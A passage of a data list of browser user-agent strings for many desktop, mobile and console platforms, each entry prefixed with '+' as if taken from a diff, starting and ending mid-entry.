(KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 
3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true +Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true +Mozilla/5.0 (Linux; U; Android 4.1; en-us; sdk Build/MR1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Safari/534.30 +Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19 +Mozilla/5.0 (Linux; U; Android 4.3; en-us; sdk Build/MR1) AppleWebKit/536.23 (KHTML, like Gecko) Version/4.3 Mobile Safari/536.23 +Mozilla/5.0 (Linux; webOS/2.2.4; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) webOSBrowser/221.56 Safari/534.6 Pre/3.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 
Firefox/4.0b6pre Camino/2.2a1pre +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:20.0) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20120813 Firefox/16.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 1083) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML like Gecko) Version/6.0.2 Safari/536.26.17 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.31 (KHTML like Gecko) Chrome/26.0.1410.63 Safari/537.31 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) 
Gecko/20090624 Firefox/3.5 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us; Silk/1.0.13.81_10003810) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 Silk-Accelerated=true +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941 +Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 
+Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3 +Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 +Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 +Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 +Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3 +Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.3.1 Safari/533.3 +Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12 +Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20130108 Firefox/10.0.12 SeaMonkey/2.7.2 +Mozilla/5.0 (PLAYSTATION 3; 1.10) +Mozilla/5.0 (PLAYSTATION 3; 2.00) +Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ +Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 
BrowserNG/7.2.7.3 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba +Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 +Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.2; 
U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0 +Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 +Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525 +Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2 +Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 +Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.29 Safari/537.36 OPR/15.0.1147.24 (Edition Next) +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 
Safari/535.7 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Beamrise/17.2.0.9 Chrome/17.0.939.0 Safari/535.8 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML like Gecko) Maxthon/4.0.0.2000 Chrome/22.0.1229.79 Safari/537.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.12 Safari/537.36 OPR/14.0.1116.4 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36 OPR/19.0.1326.56 +Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20120422 Firefox/12.0 SeaMonkey/2.9 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 +Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6 +Mozilla/5.0 (Windows NT 6.2; WOW64) 
AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0) Gecko/16.0 Firefox/16.0 +Mozilla/5.0 (Windows NT 6.2; rv:19.0) Gecko/20121129 Firefox/19.0 +Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0 +Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36 OPR/18.0.1284.49 +Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0 +Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax) +Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2 +Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; BOLT/2.800) AppleWebKit/534.6 (KHTML, like Gecko) Version/5.0 Safari/534.6.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 +Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) 
Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: ) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 +Mozilla/5.0 (Windows; U; Windows NT 6.2; es-US ) AppleWebKit/540.0 (KHTML like Gecko) Version/6.0 Safari/8900.00 +Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a +Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11 +Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/536.5 (KHTML like Gecko) Chrome/19.0.1084.56 Safari/536.5 +Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 +Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) Konqueror/4.8 +Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 
+Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.22 (KHTML like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36 +Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 +Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 +Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20120502 Firefox/12.0 SeaMonkey/2.9.1 +Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Iceweasel/14.0.1 +Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0 +Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre +Mozilla/5.0 (X11; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (X11; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (X11; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 +Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0 +Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2 +Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5 +Mozilla/5.0 (X11; 
Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.166 Safari/537.36 OPR/20.0.1396.73172 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.56 Safari/537.4 +Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre +Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 +Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20120724 Debian Iceweasel/15.02 +Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Iceweasel/19.0.2 +Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre +Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0 +Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1 +Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9 +Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 +Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15 +Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 +Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko +Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025 +Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1 +Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020 +Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu) +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian +Mozilla/5.0 (X11; U; Linux i686; 